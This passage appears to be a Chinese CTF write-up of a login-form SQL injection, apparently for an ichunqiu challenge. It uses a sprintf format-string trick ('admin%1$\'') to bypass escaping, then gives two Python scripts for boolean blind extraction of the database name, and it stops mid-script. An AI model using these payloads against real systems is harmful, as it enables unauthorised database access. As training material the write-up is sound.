看题目应该就是注入没跑了

先拿正常输入试试，输了admin，admin，结果返回password error!，说明还真的存在admin账户

拿常规注入语句试探一下admin' and 1=1#，发生了报错

 

红框这里就给了我们提示，记得之前遇上过一个sprintf格式化字符串所引起的漏洞

具体原理可以参考下面这篇文章

sprintf格式化字符串带来的注入隐患

先按照文中的方法拿admin%1$\' and 1=1#进行尝试

 

结果返回了username error！，照一开始的测试来说，若and 1=1执行成功应该会返回password error！这里猜测and被和谐了

接着换成or语句试试

 

可以看到这里or语句被成功执行了，接下来就是盲注的时间了（就希望他后面别再过滤啥关键字了）

 先看当前数据库的长度：

#coding:utf-8 import requests import string dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-=" right = 'password error!' worry = 'username error!' url = 'http://ad38630038fd4c87bd8e55c7bd876412d064d626a2e64cae.game.ichunqiu.com/' for i in range(30): key = "admin%1$\\' or " + "(length(database())=" + str(i) + ")#" data = {'username':key, 'password':'111'} r = requests.post(url, data=data).content if right in str(r): print('the length of database is %s' %i)

import requests import string dic = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-=" right = 'password error!' worry = 'username error!' url = 'http://ad38630038fd4c87bd8e55c7bd876412d064d626a2e64cae.game.ichunqiu.com/' database = '' for j in range(1,4): for each in dic: key = "admin%1$\\' or " + "(ascii(substr(database(),%s,1))="%j + str(ord(each)) + ")#" data = {'username':key, 'password':'111'} r = requests.post(url, data=data).content print(key) if right in str(r): database += each print(each) break print('the name of database is %s'